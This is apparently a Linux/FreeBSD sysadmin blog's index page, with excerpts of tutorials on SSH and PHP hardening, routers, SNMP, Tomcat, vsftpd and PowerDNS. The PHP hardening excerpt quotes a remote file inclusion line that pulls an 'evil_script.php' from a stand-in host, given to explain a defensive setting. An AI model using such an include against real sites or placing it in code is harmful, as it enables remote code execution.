SSH Security Tips – OpenSSH hardening security
In this article I'll show you some tricks to help you securing your OpenSSH service. Here you will find useful information on how to secure sshd and prevent ssh dictionary attack.
1. SSH security by tweaking sshd_config
The OpenSSH server configuration file is located in /etc/ssh/sshd_config. You need to restart sshd after every change you make to that file in order for changes to take effect.
- Change port number
Moving the SSH daemon off of port 22 protects you against automated attacks which assume that sshd is running on port 22.
Port 34912
- Allow only SSH protocol 2
Only SSH protocol version 2 connections should be permitted. Version 1 of the protocol contains security vulnerabilities. The default setting shipped in the configuration file is correct, but it's important to check.
Protocol 2
Print This Post
FreeBSD: How To Install and Configure SNMP in FreeBSD
Simple Network Management Protocol (SNMP) is a UDP-based network protocol. It is used in network management systems to monitor network-attached devices for conditions that warrant administrative attention.
1. SNMP installation using ports
Install net-snmp using this commands:
# cd /usr/ports/net-mgmt/net-snmp
# make install clean
net-snmp
2. SNMP basic configuration
Copy the default configuration file to the right location.
Print This Post
How To Set Up a FreeBSD Router – Step-by-Step Tutorial
This tutorial explains how to set up a FreeBSD system that will act as a network router that takes advantage of the ported version of OpenBSD's PF packet filter. A network router is a system that forwards packets from one interface to another.
1. FreeBSD Installation
Install FreeBSD by using this tutorial.
Now that you have FreeBSD installed, lets proceed with the next step.
2. FreeBSD Network Configuration
Open /etc/rc.conf in your favorite editor. You need to add a line for each network card present on the system, for example in our case we'll use two network cards:
Print This Post
PHP Security Tips – Securing PHP by hardening PHP configuration
When it comes to security, ignorance is definitely not blissful. There are several methods to increase the security of your PHP environment.
In this article I will discuss how to secure PHP by hardening PHP 5 configuration.
1. allow_url_fopen ( enabled by default )
This directive allows PHP's file functions ( file_get_contents, include and require statements ) to retrieve data from remote locations, like FTP or HTTP.
If an attacker can manipulate the arguments to those functions, they can use a URL under their control as the argument and run their own remote scripts. The vulnerability is called Remote file inclusion or RFI.
; Disable allow_url_fopen in php.ini for security reasons
allow_url_fopen = Off
The setting can also be applied in apache's httpd.conf :
# Disable allow_url_fopen for security reasons
php_admin_flag allow_url_fopen Off
It prevents URLs from being used in PHP. A command like include ("http://www.example.com/evil_script.php") will not be allowed to execute. Only files that reside within your site can be included: include("/var/www/html/config.inc.php").
Print This Post
How To monitor Apache traffic in real-time with apachetop
Apachetop is a very useful program that displays the stats for Apache in real time. Apachetop can show you how many requests per second are coming in, what files have been accessed and how many times. It can also show you who is hitting the sites and where they are coming from.
1. Installing apachetop
To install apachetop in CentOS, Fedora:
# yum install apachetop
Make sure you have DAG repository enabled.
Print This Post
Android: How To Set Up ADB/USB Drivers for Android Devices
Before you begin make sure you entirely read the tutorial.
1. Download Android SDK and USB drivers
Download the latest AndroidSDK from Google and extract the AndroidSDK.zip file to C:\AndroidSDK.
Download and install HTC Sync from HTC (HTC Sync is not required for ADB but it's the easiest way to install usb drivers).
If you are using HTC Hero and Microsoft Windows 7 (and you experience problems with driver installation) you have to follow this procedure to install usb drivers and HTC Sync.
Print This Post
How To Install Tomcat 6 on Ubuntu
Apache Tomcat is a servlet container developed by the Apache Software Foundation. Tomcat implements the Java Servlet and the JavaServer Pages (JSP) specifications from Sun Microsystems, and provides a "pure Java" HTTP web server environment for Java code to run.
1. Install required packages
# sudo apt-get install tomcat6 tomcat6-admin tomcat6-examples
Tomcat depends on a lot of other packages and the package manager will take care of that.
2. Check the services
Make sure the service is responding by entering the following url in a browser:
http://ipaddress:8080/
Replace ipaddress with the ip address of your server
Print This Post
How To Set Up VSFTPD virtual users ( Berkeley DB + PAM )
vsftpd is a GPL licensed FTP server for UNIX systems, including Linux and FreeBSD. It is secure, stable and extremely fast.
vsftpd will handle:
- Virtual IP configurations
- Virtual users
- Standalone or inetd operation
- Powerful per-user configurability
- Bandwidth throttling
- Per-source-IP configurability
- Per-source-IP limits
- IPv6
- Encryption support through SSL integration
- etc...
If you are hosting several web sites, for security reasons, you may want the webmasters to access their own files only. This article describes how you can install and configure vsftpd to work with virtual users.
A virtual user is a user login which does not exist as a real login on the system in /etc/passwd and /etc/shadow file. Virtual users can therefore be more secure than real users, because a compromised account can only use the FTP server but cannot login to system to use other services such as ssh, telnet or smtp.
Print This Post
Installing PowerDNS with MySQL backend and PowerAdmin On CentOS
PowerDNS is a MySQL-based DNS server, written in C++ and licensed under the GPL. PowerDNS can be managed through a web interface (PowerAdmin). This guide shows how to install it on CentOS 5.
1. Installing MySQL
# yum -y install mysql mysql-server
2. Enable MySQL on boot and start MySQL server
# chkconfig --levels 235 mysqld on
# service mysqld start
Make sure the MySQL server is running:
# netstat -tap | grep mysql
tcp 0 0 *:mysql *:* LISTEN 28179/mysqld
3. Set password for user root
# mysqladmin -u root password your_password
Print This Post
How To Set Up OpenSSH Public Key Authentication
Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices. Used primarily on GNU/Linux and Unix based systems to access shell accounts, SSH was designed as a replacement for Telnet and other insecure remote shells.
Before we start, make sure your computer has a SSH client installed and the remote Linux system has SSH installed and sshd running.
1. Generating RSA key
You will need to generate the local RSA key by running the following command:
# ssh-keygen -t rsa
Print This Post
Subscribe
Calendar
| M | T | W | T | F | S | S |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 | 31 | ||
Polls
Loading ...Quote of the day
- Zig Ziglar -
Recent Posts
- Ubuntu: How to install the Classic Desktop in Ubuntu 11.10 (Oneiric Ocelot)
- FreeBSD: How to set up an UPnP Internet Gateway Device (IGD) with MiniUPnP and FreeBSD 9.0
- Ubuntu: How to build and install Linksys AE1000 Wireless-N linux driver on Ubuntu 11.10
- FreeBSD: How to Install and Configure a PPTP VPN server with mpd5 on FreeBSD 8.2
- UNIX Tips: How to find broken symbolic links
Recent Comments
- on FreeBSD: How To Upgrade FreeBSD 7 to 8 Stable Release
- on FreeBSD: How to Install Adobe Flash in FreeBSD 8
- on How To Reset Keyring Password in Ubuntu
- on Ubuntu: How to build and install Linksys AE1000 Wireless-N linux driver on Ubuntu 11.10
- on FreeBSD: How to set up an UPnP Internet Gateway Device (IGD) with MiniUPnP and FreeBSD 9.0
Blogs
Links
Archives
- March 2012 (1)
- February 2012 (1)
- January 2012 (1)
- December 2011 (1)
- November 2011 (4)
- October 2011 (1)
- September 2011 (1)
- August 2011 (1)
- July 2011 (3)
- June 2011 (1)
- May 2011 (1)
- December 2010 (1)
- November 2010 (1)
- October 2010 (4)
- September 2010 (4)
- August 2010 (5)
- July 2010 (3)
- June 2010 (9)
- May 2010 (13)
- April 2010 (23)
- March 2010 (18)
- February 2010 (6)